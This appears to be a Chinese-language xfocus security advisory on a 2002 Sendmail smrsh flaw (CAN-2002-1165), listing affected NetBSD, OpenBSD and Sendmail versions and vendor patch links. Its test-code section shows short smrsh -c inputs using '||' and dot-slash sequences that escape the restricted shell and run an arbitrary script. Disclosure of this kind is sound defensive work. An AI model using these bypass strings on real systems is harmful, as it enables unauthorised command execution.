xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Sendmail SMRSH存在访问验证漏洞


发布时间:2002-10-01
更新时间:2002-11-13
严重程度:
威胁程度:普通用户访问权限
错误类型:输入验证错误
利用方式:客户机模式

BUGTRAQ ID:5845
CVE(CAN) ID:CAN-2002-1165

受影响系统
NetBSD NetBSD 1.5
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.6
OpenBSD OpenBSD 2.1
OpenBSD OpenBSD 2.2
OpenBSD OpenBSD 2.3
OpenBSD OpenBSD 2.4
OpenBSD OpenBSD 2.5
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.8
OpenBSD OpenBSD 2.9
OpenBSD OpenBSD 3.0
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.2
Sendmail Consortium Sendmail 8.11.6
Sendmail Consortium Sendmail 8.12 .0
Sendmail Consortium Sendmail 8.12.1
Sendmail Consortium Sendmail 8.12.2
Sendmail Consortium Sendmail 8.12.3
Sendmail Consortium Sendmail 8.12.4
Sendmail Consortium Sendmail 8.12.5
Sendmail Consortium Sendmail 8.12.6
详细描述
Sendmail是一款流行的免费开放源代码的邮件传输程序,由Sendmail Consortium维护,可以运行于大多数的Unix/Linux平台。

smrsh是用来保护限定环境外执行命令,然而当命令输入包含双管道符(||)或混合点(.)和斜杠(/),用户可以绕过smrsh的检查超出限定环境去执行命令。

测试代码
$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute

OR one of the following types of commands:

smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"

解决方案
Users of Gentoo Linux are advised to upgrade using the following commands:

emerge rsync
emerge sendmail
emerge clean

Conectiva has released an advisory. Fixes are available.





NetBSD NetBSD 1.5:
NetBSD NetBSD 1.5.1:
NetBSD NetBSD 1.5.2:
NetBSD NetBSD 1.5.3:
NetBSD NetBSD 1.6:
OpenBSD OpenBSD 2.1:
OpenBSD OpenBSD 2.2:
OpenBSD OpenBSD 2.3:
OpenBSD OpenBSD 2.4:
OpenBSD OpenBSD 2.5:
OpenBSD OpenBSD 2.6:
OpenBSD OpenBSD 2.7:
OpenBSD OpenBSD 2.8:
OpenBSD OpenBSD 2.9:
OpenBSD OpenBSD 3.0:

OpenBSD Patch 034_smrsh.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/034_smrsh.patch

OpenBSD OpenBSD 3.1:

OpenBSD Patch 017_smrsh.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/017_smrsh.patch

OpenBSD OpenBSD 3.2:

OpenBSD Patch 003_smrsh.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/003_smrsh.patch

Sendmail Consortium Sendmail 8.11.6:

Conectiva Upgrade sendmail-8.11.6-1U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_2cl.i386.rpm

Conectiva Upgrade sendmail-cf-8.11.6-1U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_2cl.i386.rpm

Conectiva Upgrade sendmail-doc-8.11.6-1U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_2cl.i386.rpm

Conectiva Upgrade sendmail-8.11.6-1U60_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_2cl.src.rpm

Conectiva Upgrade sendmail-8.11.6-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_2cl.i386.rpm

Conectiva Upgrade sendmail-cf-8.11.6-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_2cl.i386.rpm

Conectiva Upgrade sendmail-doc-8.11.6-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_2cl.i386.rpm

Conectiva Upgrade sendmail-8.11.6-1U70_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_2cl.src.rpm

Conectiva Upgrade sendmail-8.11.6-2U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-8.11.6-2U80_1cl.i386.rpm

Conectiva Upgrade sendmail-cf-8.11.6-2U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-cf-8.11.6-2U80_1cl.i386.rpm

Conectiva Upgrade sendmail-doc-8.11.6-2U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-doc-8.11.6-2U80_1cl.i386.rpm

Conectiva Upgrade sendmail-8.11.6-2U80_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/sendmail-8.11.6-2U80_1cl.src.rpm

Sendmail Consortium Sendmail 8.12 .0:

Sendmail Consortium Patch smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch

Sendmail Consortium Sendmail 8.12.1:

Sendmail Consortium Patch smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch

Sendmail Consortium Sendmail 8.12.2:

Sendmail Consortium Patch smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch

Sendmail Consortium Sendmail 8.12.3:

Sendmail Consortium Patch smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch

Sendmail Consortium Sendmail 8.12.4:

Sendmail Consortium Patch smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch

Sendmail Consortium Sendmail 8.12.5:

Sendmail Consortium Patch smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch

Sendmail Consortium Sendmail 8.12.6:

Sendmail Consortium Patch smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch

相关信息
zen-parse <zen-parse@gmx.net>

参考:http://online.securityfocus.com/advisories/4536
      http://online.securityfocus.com/advisories/4555
      http://online.securityfocus.com/advisories/4565
相关主页:http://www.sendmail.org/
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved